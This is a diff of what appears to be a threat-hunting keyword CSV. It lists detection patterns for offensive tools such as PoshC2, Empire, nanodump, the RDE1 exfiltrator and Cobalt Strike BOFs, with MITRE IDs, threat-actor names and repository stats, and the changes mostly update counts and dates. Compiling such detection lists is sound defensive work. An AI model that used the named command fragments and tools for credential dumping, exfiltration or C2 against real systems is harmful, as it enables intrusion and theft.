+"*crackmapexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*crackpkcs12*","offensive_tool_keyword","crackpkcs12","A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu","T1110 - T1185 - T1114","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/crackpkcs12/crackpkcs12","1","1","N/A","N/A","2","118","26","2019-04-26T18:38:11Z","2015-03-19T22:26:17Z"
 "*crackTGS*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","0","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z"
 "*Crassus.csproj*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z"
 "*Crassus.exe*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z"
 "*Crassus.sln*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z"
-"*crate::modules::{rec2mastodon,rec2virustotal}*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
-"*CravateRouge/autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z"
-"*CravateRouge/bloodyAD*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z"
+"*crate::modules::{rec2mastodon,rec2virustotal}*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*CravateRouge/autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z"
+"*CravateRouge/bloodyAD*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z"
 "*crawlLdrDllList*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z"
-"*crde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
-"*crde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
-"*crde::utils::checker*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
-"*crde_x64.exe dns -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
-"*crde_x64.exe https -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde::utils::checker*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde_x64.exe dns -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*crde_x64.exe https -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
 "*CREATE DATABASE C2;*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
 "*create_dummy_dll_file*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
 "*create_protected_process_as_user*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
 "*create-aws-instance.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
 "*CreateC2Dialog.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
 "*CreateC2Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
-"*createdaisypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*createlinuxpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*Create-MultipleSessions.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
-"*Create-NamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*createnewpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*createnewshellcode*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*createpbindpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*createdaisypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*createlinuxpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Create-MultipleSessions.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Create-NamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*createnewpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*createnewshellcode*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createpbindpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*CreateProcessAsUser*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*createproxypayload -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and 
lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*createproxypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Create-SuspendedWinLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Create-WinLogonProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*createproxypayload -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
